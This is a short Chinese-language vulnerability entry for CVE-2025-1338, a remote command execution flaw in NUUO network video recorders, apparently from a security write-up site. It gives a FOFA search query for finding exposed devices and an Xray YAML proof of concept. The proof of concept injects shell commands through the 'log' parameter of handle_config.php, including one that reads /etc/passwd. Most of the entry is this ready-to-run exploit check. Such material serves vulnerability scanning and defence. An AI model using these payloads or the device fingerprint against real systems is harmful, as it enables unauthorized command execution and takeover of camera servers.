NUUO摄像机handle_config.php远程命令执行CVE-2025-1338
参考链接:
https://mp.weixin.qq.com/s/Jg6ngchbn0pwWJ01nkMSEg
漏洞介绍:
NUUO NVR是中国台湾省NUUO公司旗下的一款网络视频记录器,该设备存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,进而获取服务器的权限。
资产指纹:
title="Network Video Recorder Login" || body="www.nuuo.com/eHelpdesk.php"
Xray-poc:
name: poc-yaml-nuuo-handleconfig-cve-2025-1338-command-exec transport: http set: r1: randomInt(8000, 10000) r2: randomInt(8000, 10000) rules: r0: request: method: GET path: /handle_config.php?log=;cat%20/etc/passwd; follow_redirects: false headers: Content-Type: application/x-www-form-urlencoded expression: >- response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".matches(response.body_string) r1: request: method: GET path: /handle_config.php?log=;expr%20{{r1}}%20*%20{{r2}}; follow_redirects: false headers: Content-Type: application/x-www-form-urlencoded expression: >- response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) expression: r0() || r1() detail: author: Cysec links: - https://mp.weixin.qq.com/s/Jg6ngchbn0pwWJ01nkMSEg description: NUUO摄像机handle_config.php远程命令执行CVE-2025-1338 fofakeyword: title="Network Video Recorder Login" || body="www.nuuo.com/eHelpdesk.php"

浙公网安备 33010602011771号